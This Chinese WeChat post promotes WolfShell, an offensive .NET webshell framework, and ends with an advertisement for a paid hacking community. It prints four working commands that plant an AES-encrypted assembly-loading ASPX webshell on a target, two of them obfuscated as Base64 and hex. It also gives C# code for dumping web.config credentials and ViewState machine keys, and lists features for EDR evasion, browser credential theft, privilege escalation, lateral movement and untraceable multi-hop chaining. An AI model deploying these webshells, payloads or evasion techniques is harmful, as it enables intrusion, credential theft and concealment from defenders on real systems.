由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
前言
🚀 核心优势
支持AI渗透:支持使用自然语言指挥AI操作WebShell执行命令进行渗透。
高效隐蔽的通信: 采用 二进制流 传输协议,确保通信的高效性与隐蔽性。
端到端安全加密: 所有传输 Payload 均经过 AES加密 保护,且每次通信使用 随机密钥,保障数据安全。
无痕运行: 支持直接在 内存中加载并执行代码,最大程度避免在磁盘留下痕迹,显著提升操作隐蔽性和安全性。
内网级联WebShell控制: 通过现有已控的WebShell,无需部署代理或配置端口转发,即可连接控制更深层内网环境中的WebShell。
Hacking后渗透:通过已控的 WebShell 在内存中加载渗透工具,无需部署代理或配置端口转发,即可实现便捷高效的内网横向渗透。
语言特征: 服务端(webshell)及payload均为纯英文,只有提供的WebShell变种文件包含英文、日文、韩文。
🔥 功能特性
Shell支持:支持ASPX、ASHX、ASMX、HTTP、TCP、PS1、EXE、DLL(当前仅开放ASPX、ASHX及内存马三种类型)。
内存马:一键注入ASPX内存马,支持任意路径访问,每次均可修改Shell连接地址,有效干扰蓝队分析。
Cmd命令执行:在目标系统上直接执行任意CMD命令,内置魔改版whoami,规避EDR记录与告警。
文件管理:支持目录文件枚举、新建文件、文件上传、EXE执行、重命名、删除及修改文件时间等操作。
PowerShell执行:执行PowerShell代码与命令,集成魔改版whoami,避免EDR监测。
Shellcode执行:在目标环境中直接运行原生Shellcode,可一键上线Cobalt Strike、Metasploit。
.NET程序执行:内存加载执行自定义.NET程序集,快速扩展后渗透能力。
内存加载扫描器:仅需编写单个IP的.NET程序,即可通过该模块实现内存加载的C段扫描。
ValidationKey提取:获取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息。
web.config读取:提取数据库连接信息(数据库名、用户、密码)及SMTP/邮件服务器账号密码等。
端口转发:实现本地端口到远程内网主机的映射,便于安全访问内部网络服务。
HTTP代理:一键内存注入Suo5高性能HTTP隧道代理工具。
权限提升(Potato系列):支持EfsPotato、BadPotato,利用系统服务漏洞提权。
内网级联命令执行:支持级联至内网第二层WebShell执行CMD命令,实现横向移动。
内网级联PowerShell执行:支持级联至内网第二层WebShell执行PowerShell命令,进行横向移动。
SshCmd:SSH远程命令执行工具,支持对内网主机执行命令、文件上传下载,实现横向移动。
MysqlCmd:MySQL数据库连接工具,支持连接内网MySQL,执行查询、导入导出等数据库操作。
MssqlCmd:SQL Server数据库连接工具,支持连接内网数据库,执行查询、导入导出、横向移动、命令执行及Potato提权等。
SharpWeb:浏览器凭据抓取工具,支持提取Chrome、Firefox、Edge中保存的登录信息与凭据。
密码读取:支持IISpwd、wifipwd、FileZillaPwd、firefoxpwd、XshellPwd、GetPwd、FirefoxHistory、FirefoxCookie等。
漏洞检测:集成MS17010、SMBGhost、HikvisionPoc、ActivemqPoc、Struts2Poc、WeblogicPoc、CVE-2022-36537、CVE-2024-47176、CVE-2022-27925、CVE-2024-27956等检测模块。
横向工具:包括wshell、SmbExec、WmiExec、WmiExec2、AtExec、MssqlCmd、MmcExec、ShellExec、ShellBrowserExec等。
AI免杀:接入人工智能,通过对话即可生成免杀WebShell。
Ladon:内网渗透工具集,内存加载无文件落地,涵盖端口扫描、资产探测、密码审计、漏洞检测、漏洞利用、横向移动等功能(工具持续集成中,当前已完成10余种协议资产探测,其余模块暂未支持。与Potato类似,无法集成全部工具,部分功能需使用原程序)。
AddUser:绕过EDR/XDR添加系统用户、管理员、域用户、域管理员。
NoPowerShell:在PowerShell被禁用或不存在的情况下,执行PowerShell命令、代码及文件。
辅助功能
AI人工智能
AI免杀:接入AI人工智能,聊个天就能免杀WebShell。
加密解密
支持加密算法: BASE64、HEX、ASCII、PowerShell、MD5、SHA1、SHA256、URL编码
支持解密算法: BASE64、HEX、ASCII、PowerShell、URL编码
安装与使用
下载WolfShell
git clone https://github.com/0x7556/wolfshell.git配置环境
确保目标环境支持ASPX、ASHX,并已正确配置。
上传WolfShell
将WolfShell文件上传到目标服务器,支持ASPX、ASHX、内存马3种类型。
WebShell脚本: https://github.com/0x7556/wolfshell/tree/main/shell
访问WebShell
通过工具客户端连接WebShell,默认密码 WolfShell,修改密码可使用工具上的WolfHash加密。
使用环境
操作系统: Windows
.NET 版本: .NET Framework 4.8
命令 | 漏洞 GetShell
具备命令执行条件时,可通过以下4种方法写入 金刚狼 WebShell
PowerShell写入wolf.aspx
powershell -Command "Set-Content -Path 'wolf.aspx' -Value '<%@ Page Language=\"C#\" %><%if (Request.Cookies.Count != 0) { byte[] k = Encoding.Default.GetBytes(\"ca63457538b9b1e0\"); System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"K\").Equals(this); }%>'"PowerShell命令 Base64写入wolf.aspx
powershell -EncodedCommand UwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAIgB3AG8AbABmAC4AYQBzAHAAeAAiACAALQBWAGEAbAB1AGUAIAAnADwAJQBAACAAUABhAGcAZQAgAEwAYQBuAGcAdQBhAGcAZQA9ACIAQwAjACIAIAAlAD4APAAlAGkAZgAgACgAUgBlAHEAdQBlAHMAdAAuAEMAbwBvAGsAaQBlAHMALgBDAG8AdQBuAHQAIAAhAD0AIAAwACkAIAB7ACAAYgB5AHQAZQBbAF0AIABrACAAPQAgAEUAbgBjAG8AZABpAG4AZwAuAEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAiAGMAYQA2ADMANAA1ADcANQAzADgAYgA5AGIAMQBlADAAIgApADsAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtACAAcwAgAD0AIABSAGUAcQB1AGUAcwB0AC4ASQBuAHAAdQB0AFMAdAByAGUAYQBtADsAIABiAHkAdABlAFsAXQAgAGMAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAcwAuAEwAZQBuAGcAdABoAF0AOwAgAHMALgBSAGUAYQBkACgAYwAsACAAMAAsACAAYwAuAEwAZQBuAGcAdABoACkAOwAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQAuAEwAbwBhAGQAKABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAAoACkALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGsALAAgAGsAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKABjACwAIAAwACwAIABjAC4ATABlAG4AZwB0AGgAKQApAC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAIgBLACIAKQAuAEUAcQB1AGEAbABzACgAdABoAGkAcwApADsAIAB9ACUAPgAnAA==cmd命令 echo & certutil 写入wolf.aspx
echo 3c25402050616765204c616e67756167653d2243232220253e3c2569662028526571756573742e436f6f6b6965732e436f756e7420213d203029207b20627974655b5d206b203d20456e636f64696e672e44656661756c742e476574427974657328223961613337623163323561303834653022293b2053797374656d2e494f2e53747265616d2073203d20526571756573742e496e70757453747265616d3b20627974655b5d2063203d206e657720627974655b732e4c656e6774685d3b20732e5265616428632c20302c20632e4c656e677468293b2053797374656d2e5265666c656374696f6e2e417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528224b22292e457175616c732874686973293b207d253e > w.hex && certutil -f -decodehex w.hex wolf.aspx && del w.hexcmd命令 echo 写入wolf.aspx
echo ^<%@ Page Language="C#" %^> > wolf.aspx && echo ^<% if (Request.Cookies.Count != 0) { >> wolf.aspx && echo byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); >> wolf.aspx && echo System.IO.Stream s = Request.InputStream; >> wolf.aspx && echo byte[] c = new byte[s.Length]; >> wolf.aspx && echo s.Read(c, 0, c.Length); >> wolf.aspx && echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); >> wolf.aspx && echo } %^> >> wolf.aspx功能示例
自定义.NET程序执行
.NET程序执行: 支持内存加载执行自定义.NET程序集,快速扩展后渗透能力。

AI人工智能
使用AI兔杀金刚狼 WebShell 服务端

级联内网第3层WebShell 执行Cmd命令
通过入口点 192.168.50.106 级联内网 192.168.50.159 再次级联下一层内网 192.168.50.69 WebShell 执行命令
PS: 当然也可级联外网,比如抓了一些服务器当跳板,真正要搞的目标在第3层,这样就很难被追踪或溯源到你的真实IP了

级联内网第2层WebShell 执行Cmd命令
通过入口点 192.168.50.159 级联内网 192.168.50.106 WebShell执行命令

WebShell入口点 执行Cmd命令

WebShell入口点 执行PowerShell命令/代码
whoami代码实现非系统whoami
支持命令执行、代码执行 长度9K
输入info、ver可查看操作系统版本、位数、.NET版本、PowerShell版本信息
输入whoami、username可自动转成对应powershell代码查看用户信息
Base64加密代码执行 示例 base64:ZWNobyBXb2xmU2hlbGw=
PS C:\Users\admin>whoamiwhoami: IIS APPPOOL\DefaultAppPoolUsername: WIN-021V7TK43N5$PS C:\Users\admin>infoOperating System Version: Microsoft Windows Server 2019 Datacenter 64 bitVersion Number: 10.0.17763PowerShell Version:5.1.17763.1.NET Detailed Versions:PSChildName Version Release----------- ------- -------Client 4.7.03190 461814PS C:\Users\admin>base64:ZWNobyBXb2xmU2hlbGw=WolfShellPS C:\Users\admin>Write-Host "Current User:`n$env:USERNAME"Current User:WIN-021V7TK43N5$

文件管理

C#代码执行
获取 ValidationKey 示例代码
ValidationKey:提取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息
using System;using System.Reflection;using System.Web.Configuration;public class Eval{public string eval(Object obj){var sy = Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");var gac = mkt.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);var cg = (MachineKeySection)gac.Invoke(null, new object[0]);return "ValidationKey: " + cg.ValidationKey + " | " + "Validation: " + cg.Validation + " | " + "DecryptionKey: " + cg.DecryptionKey + " | " + "Decryption: " + cg.Decryption + " | " + "CompatibilityMode: " + cg.CompatibilityMode;}}

扫描C段存活主机 示例代码
using System;using System.Net;using System.Net.NetworkInformation;using System.Text;using System.Threading.Tasks;public class Eval{publicstringeval(Object obj){StringBuilder iplist = new StringBuilder();string baseIP = "192.168.1.";PingOptions options = new PingOptions();options.DontFragment = true;var tasks = new Task[254];for (int i = 1; i < 255; i++){int ipSuffix = i;tasks[i - 1] = Task.Run(() =>{using (Ping myPing = new Ping()){PingReply reply = myPing.Send(baseIP + ipSuffix, 120);if (reply.Status == IPStatus.Success){lock (iplist){iplist.AppendLine("Alive IP: " + reply.Address.ToString());}}}});}Task.WaitAll(tasks);return iplist.ToString();}}

CMD命令执行 示例代码
using System;using System.Diagnostics;public class Eval{public string eval(Object obj){try{Process process = new Process();process.StartInfo.FileName = "cmd.exe";process.StartInfo.Arguments = "/c whoami";process.StartInfo.UseShellExecute = false;process.StartInfo.RedirectStandardOutput = true;process.Start();string result = process.StandardOutput.ReadToEnd();process.WaitForExit();return result;}catch (Exception ex){return "Error occurred: " + ex.Message;}}}

获取web.config密码 示例代码
web.config读取:提取数据库连接信息(数据库名、用户、密码)、SMTP/邮件服务器用户密码等。
using System;using System.Configuration;using System.Text;public class Eval{publicstringeval(Object obj){try{var connectionStrings = ConfigurationManager.ConnectionStrings;var appSettings = ConfigurationManager.AppSettings;var result = new StringBuilder();foreach (ConnectionStringSettings connectionString in connectionStrings){result.AppendLine("Connection string name: " + connectionString.Name);result.AppendLine("Connection string value: " + connectionString.ConnectionString);result.AppendLine();}result.AppendLine();foreach (string key in appSettings.AllKeys){result.AppendLine("Key: " + key + ", Value: " + appSettings[key]);}return result.ToString();}catch (Exception ex){return "Error occurred: " + ex.Message;}}}

加密解密算法
支持加密算法: BASE64、HEX、ASCII、PowerShell、MD5、SHA1、SHA256、URL编码 支持解密算法: BASE64、HEX、ASCII、PowerShell、URL编码
金刚狼密码

BASE64解密

Potato提权示例
efspotato提权

badpotato提权

内网扫描示例

端口转发示例

HTTP代理示例

Hacking后渗透
SSH远程命令执行示例
Usage:sshcmd 192.168.50.128 22 root toor idsshcmd 192.168.50.128 22 root toor download /tmp/down.rar c:\down.rarsshcmd 192.168.50.128 22 root toor upload c:\upload.rar /tmp/upload.rarKeybordsshcmd 192.168.50.128 22 root toor download2 /tmp/down.rar c:\down.rarsshcmd 192.168.50.128 22 root toor upload2 c:\upload.rar /tmp/upload.rar

Mysql数据库连接示例
mysqlcmd host port user pass dbname sqlstrmysqlcmd host port user pass dbname sqlb64Demo:mysqlcmd 192.168.50.139 3306 root WolfShell mysql infomysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT VERSION(); ""mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT 3+5 ""mysqlcmd 192.168.50.139 3306 root WolfShell mysql c2VsZWN0IDMrNQ==";

读取浏览器密码示例
SharpWeb:浏览器凭据抓取工具,支持提取已保存的 Chrome、Firefox、Edge 登录信息与凭据
Usage:SharWeb arg0 [arg1 arg2 ...]Arguments:all - Retrieve all Chrome, FireFox and IE/Edge credentials.full - The same as 'all'chrome - Fetch saved Chrome logins. e.g. -d Directoryfirefox - Fetch saved FireFox logins. e.g. -p masterkey -d Directoryedge - Fetch saved Internet Explorer/Microsoft Edge logins.Demo:SharWeb allSharWeb chromeSharWeb chrome -d C:\OutputSharWeb firefox -p mymasterkey -d C:\OutputSharWeb edge=======================================================================

Ladon内网渗透工具示例
20251106 主要集成以下探测功能,其它功能暂未支持
Usage:Ladon whoamiLadon 192.168.50.159/24 ICMP ICMP存活主机探测Ladon 192.168.50.159/24 PortScan 开放端口服务扫描Ladon 192.168.50.159/24 WebScan 网站标题、中间件Ladon 192.168.50.159/24 SmbInfo SMB存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 NbtInfo NBT存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 WmiInfo WMI存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 LdapInfo LDAP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 RdpInfo RDP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 SmtpInfo SMTP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 HttpInfo HTTP存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 WinrmInfo Winrm存活主机探测、NTLM系统信息Ladon 192.168.50.159/24 MssqlInfo SQL数据库主机探测、NTLM系统信息Ladon 192.168.50.159/24 FtpInfo FTP存活主机探测Ladon 192.168.50.159/24 T3Info Weblogic协议探测Ladon 192.168.50.159/24 CiscoInfo Cisco路由器探测Ladon 192.168.50.159/24 SnmpInfo SNMP设备探测,如路由器、交换机等Ladon 192.168.50.159/24 OxidInfo Windows多网卡主机探测Ladon 192.168.50.159/24 EthInfo Windows多网卡主机探测Ladon http://0x7556.org WPinfo WordPress版本、插件探测、漏洞Ladon 192.168.50.159/24 DnsInfo DNS存活主机探测、域名识别
SMB协议NTLM信息OS操作系统识别

WebScan 网站标题、中间件扫描

端口扫描 示例
PortScan 192.168.50.159
PortScan 192.168.50.159 80,22,135,445

MS17010 漏洞检测

SQL Server横向移动 数据库提权

Xshell密码读取

webkey 密码读取
解析web.config 获取ValidationKey (ViewState反序列化 Exchange、SharePoint后门)

CVE-2025-55182 Next.js Rce 漏洞利用
[+]CVE-2025-55182 CVE-2025-55182 Next.js Rce 漏洞利用 [+]NextJSexp CVE-2025-55182 Next.js Rce 漏洞利用

内存加载 内网扫描器
内存加载扫描器
只需研发单个IP的.NET程序,通过该模块即可变成内存加载的C段扫描器。
如只需实现对1个IP的检测、漏洞利用等工具,注意:类和方法需为 Public
自定义工具 原始用法
F:\py>urltitle.exe 192.168.50.1
URL: http://192.168.50.1/ | Status: 200 | Banner: httpd/2.0 | Title: No Title
远程内存加载 变身 内网C段扫描器
使用方法:
将目标 EXE 拖放到“ExePath”文件路径输入框。
在“C 段”输入框中填写要扫描的网段(例如 192.168.1.0/24)。
点击“Scan”按钮开始扫描。扫描行为和结果由所加载的 EXE 功能决定。
说明:
加载器默认先通过 ICMP(ping)探测目标是否存活,只有存活的主机才会被加载并执行自定义 EXE。
若目标网络禁用 ICMP 响应,请取消勾选“先行探测/ICMP”选项以跳过探测步骤。 --

内存加载扫描器 内置MS17010漏洞检测

https://github.com/0x7556/wolfshell交流群

广告:cisp pte/pts &nisp1级2级低价报考
陌笙安全纷传圈子+陌笙src挖掘知识库+陌笙安全漏洞库+陌笙安全面试题库简单介绍(加入纷传圈子送知识库+漏洞库+面试题库)
如果觉得合适可以加入,圈子目前价格39.9元,价格只会根据圈子内容和圈子人数进行上调,不会下跌。。。
圈子福利
edu漏洞挖掘1v1指导出洞


陌笙src挖掘知识库介绍(内容持续更新中)
信息收集(会永久提供fofa-key助力)弱口令漏洞任意文件读取&删除&下载漏洞sql注入漏洞url重定向漏洞未授权访问漏洞挖掘XSS漏洞挖掘等等常见漏洞EDUSRC证书站挖掘案例分享SRC挖掘实战针对各种常见功能总结的常见测试思路等经典常见Nday漏洞复现等各模块不在一一介绍
src挖掘基础

src挖掘实战

edusrc

经典nday复现

陌笙安全漏洞库介绍
1day&0day分享EDU学校相关漏洞Web应用漏洞CMS漏洞OA产品漏洞中间件漏洞云安全漏洞人工智能漏洞其他漏洞

陌笙安全面试库
渗透测试基本问题一汇总渗透测试基本问题二汇总渗透测试基本问题三汇总微步护网面试题目长亭科技面试深信服护网面试启明星辰渗透测试面试题目安恒面试题目360面试奇安信护网面试运维面试题目运维面试题库网安面试相关文档大全相关面试文章推荐等等

陌笙纷传圈子介绍
1、src挖掘思维导图,信息收集思维导图,edusrc挖掘思维导图,以及后续的红队&面试思维导图&自己网安笔记等持续更新2、2025-2026的edusrc实战报告包含证书站和非证书站以及2025之前的各种优质报思路分享3、各种src报告思路分享(内部&外部)4、分享各种src挖掘&edusrc挖掘培训资料&视频5、不定期分享通杀、0day6、有圈子群可以技术交流以及不定期抽取证书&免费rank7.分享各种护网资料各家安全厂商讲解视频&精选实战面试题目8、各种框架漏洞技巧分享9、各种源码分享(泛微、正方系统、用友等)10、漏洞挖掘工具&信息收集工具&内网渗透免杀等网安工具分享11、各种ctf资料以及题目分享12、cnvd挖掘技巧&CNVD资产&src资产分享&补天1权重资产分享&fofakey共用13、免杀、逆向、红队攻内网防渗透等课程分享14、漏洞库&字典以各种内容不在一一说明15、cisp-pte/pts&nisp一级&nisp二级&edusrc证书内部价格15、如果有漏洞挖掘问题或者工具资料需求可以找群主(尽量满足)


目前650多条内容,扫码查看详情,持续更新中。。
如果觉得合适可以加入,价格不定期会根据圈子内容和圈子人数进行上调。。

夜雨聆风